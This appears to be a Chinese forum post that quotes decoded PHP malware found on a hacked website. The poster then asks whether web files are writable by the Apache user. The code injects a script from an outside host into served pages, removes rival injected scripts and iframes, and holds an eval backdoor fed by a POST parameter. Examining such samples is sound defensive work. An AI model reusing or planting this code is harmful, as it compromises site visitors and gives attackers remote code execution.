base64 解碼後:
if(!function_exists('rx2')){function rx2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2xld29yLmNvbS5wbC9TbWFydHkvdGVtcGxhdGVzX2xld29yL1NtYXJ0eS5jbGFzcy5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function rx22($a,$b,$c,$d){global$rx21;$s=array();if(function_exists($rx21))call_user_func($rx21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='rx2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('rx2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$rx2l=(($a=@set_error_handler('rx22'))!='rx22')?$a:0;eval(base64_decode($_POST['e']));
真討厭,不大想解開了~~~
我比較想問的是,你們的網頁本身都是 apache 身份可以寫入的嗎?要不然怎麼都會被修改。